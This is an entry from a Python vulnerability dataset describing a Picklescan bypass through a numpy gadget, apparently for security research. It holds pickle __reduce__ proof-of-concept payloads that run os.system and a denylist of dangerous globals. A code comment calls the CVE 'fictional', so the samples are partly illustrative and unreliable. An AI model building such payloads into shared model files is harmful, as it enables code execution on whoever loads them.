CVE-2025-71372
Picklescan detection bypass allows code execution via a numpy gadget.
- CVSS 7.6
- CWE-502
- Input Validation and Sanitization
- Local
Picklescan before 0.0.33 fails to detect the numpy.f2py.crackfortran.getlincoef gadget in pickle __reduce__ methods, allowing arbitrary code execution. Attackers can craft malicious pickle files that execute arbitrary Python code when loaded, bypassing Picklescan's safety checks and enabling supply-chain poisoning of shared model files.
- CWE
- CWE-502
- CVSS base score
- 7.6
- Published
- 2026-07-04
- OWASP
- A08 Software and Data Integrity Failures
- Orthogonal defect classification
- Checking
- Code defect classification
- Missing Check
- Category
- Input Validation and Sanitization
- Subcategory
- Insecure Parsing or Deserialization
- Accessibility scope
- Local
- Impact
- Arbitrary Code Execution
- Affected component
- Picklescan
- Fixed by upgrading
- Yes
Solution
Upgrade Picklescan to version 0.0.33 or later.
Vulnerable code sample
import pickle
import os
class Exploit:
def __reduce__(self):
# The fictional CVE-2025-71372 describes using a specific numpy
# function as a gadget. To represent the arbitrary code execution
# impact of such a vulnerability, we use a classic and direct
# gadget, `os.system`. An older version of a scanner would fail
# to block the gadget described in the CVE, leading to this result.
command = 'echo "Vulnerability demonstration: Arbitrary Code Execution"'
return (os.system, (command,))
# Create the malicious pickle payload
malicious_pickle = pickle.dumps(Exploit())
# A vulnerable application loads the pickle, triggering the exploit
pickle.loads(malicious_pickle)Patched code sample
# This code hypothetically represents the fix for CVE-2025-71372 in a
# security scanner like Picklescan. The vulnerability is that a specific
# function was not on the denylist of dangerous functions that can be
# used for arbitrary code execution. The fix is to add it to that list.
# A simplified representation of a security scanner's denylist of dangerous globals.
# The fix for the vulnerability is the addition of the 'numpy.f2py.crackfortran.getlincoef'
# tuple to this set, preventing it from being used in a pickle.
DANGEROUS_GLOBALS_DENYLIST = {
# Previously existing dangerous globals
("os", "system"),
("subprocess", "run"),
("builtins", "eval"),
("builtins", "exec"),
("shutil", "rmtree"),
# Fix for CVE-2025-71372: Add the newly discovered dangerous gadget
# from numpy to the denylist. Any pickle file attempting to use this
# function via __reduce__ would now be flagged as malicious by the scanner.
("numpy.f2py.crackfortran", "getlincoef"),
}Payload
import pickle
import numpy
class Exploit:
def __reduce__(self):
command = 'echo "Code execution successful"'
return (numpy.f2py.crackfortran.getlincoef, (f'c = __import__("os").system(\'{command}\')',))
payload = pickle.dumps(Exploit())
# To use this, save the `payload` variable to a file, e.g., model.pkl
# For demonstration, we print the payload bytes.
print(payload)
Cite this entry
@misc{vaitp:cve202571372,
title = {{Picklescan detection bypass allows code execution via a numpy gadget.}},
author = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
year = {2026},
note = {VAITP Python Vulnerability Dataset, entry CVE-2025-71372},
howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2025-71372/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.
The supreme art of war is to subdue the enemy without fighting.
Sun Tzu – “The Art of War”
:: Shaping the future through research and ingenuity ::
